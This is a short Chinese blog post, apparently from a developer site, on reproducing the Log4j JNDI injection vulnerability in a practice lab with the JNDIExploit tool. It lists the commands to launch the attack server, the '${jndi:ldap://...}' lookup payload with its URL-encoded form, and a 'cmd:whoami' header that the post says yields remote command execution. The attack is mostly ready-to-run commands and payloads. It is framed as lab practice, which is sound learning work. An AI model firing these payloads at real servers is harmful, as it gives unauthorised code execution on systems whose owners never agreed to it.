JNDIExploit-1.2-SNAPSHOT.jar工具在log4j漏洞复现中的使用

wutiangui2023-09-14 9:58

1.首先搭建log4j靶场

2.开启服务

Windows攻击端执行以下命令

java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1

再开一个cmd可以看下能用什么payload

java -jar JNDIExploit-1.2-SNAPSHOT.jar -u

以上payload都可以尝试,我们使用

ldap://null:1389/TomcatBypass/TomcatEcho

3.构造请求

${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}

转成URL

%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D

4.开启bp

请求包中增加cmd:whoami

执行后发现命令可以执行

相关推荐
喵手3 分钟前
使用 Java 集合进行缓存系统设计的实践分享!
java·开发语言·缓存
麻衣带我去上学4 分钟前
Spring依赖注入源码学习:基于注解的DI源码解析
java·后端·spring
mldong9 分钟前
mldong 快速开发框架字典模块设计与实现
java·后端·架构
小猫咪怎么会有坏心思呢12 分钟前
华为OD机考-最小循环子数组-字符串(JAVA 2025B卷)
java·开发语言·华为od
岁忧18 分钟前
(LeetCode 面试经典 150 题) 169. 多数元素(哈希表 || 二分查找)
java·c++·算法·leetcode·go·散列表
YuTaoShao19 分钟前
【LeetCode 热题 100】15. 三数之和——排序 + 双指针解法
java·算法·leetcode·职场和发展
巴巴_羊25 分钟前
React JSX原理
java
迢迢星万里灬30 分钟前
Java求职者面试指南:微服务技术与源码原理深度解析
java·spring cloud·微服务·dubbo·netty·分布式系统·面试指南
我崽不熬夜42 分钟前
如何让你的Java代码更加优雅且高效?你也许忽视了这些细节!
java·后端·java ee
Pitayafruit1 小时前
后端开发必看:零代码实现存量服务改造成MCP服务
java·后端·mcp
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解03Coze扣子平台完整体验和实践(附国内和国际版对比)04字节跳动“扣子空间”AI智能体全解析05DeepSeek各版本说明与优缺点分析06从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑07免费可用!最强AI数字人对口型神器:让照片开口说话唱歌,支持多人对口型+全身动作,1分钟学会!(附保姆级教程)08AI Agent | Coze 插件使用指南:从功能解析到实操步骤09YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】10GPU 进阶笔记(二):华为昇腾 910B GPU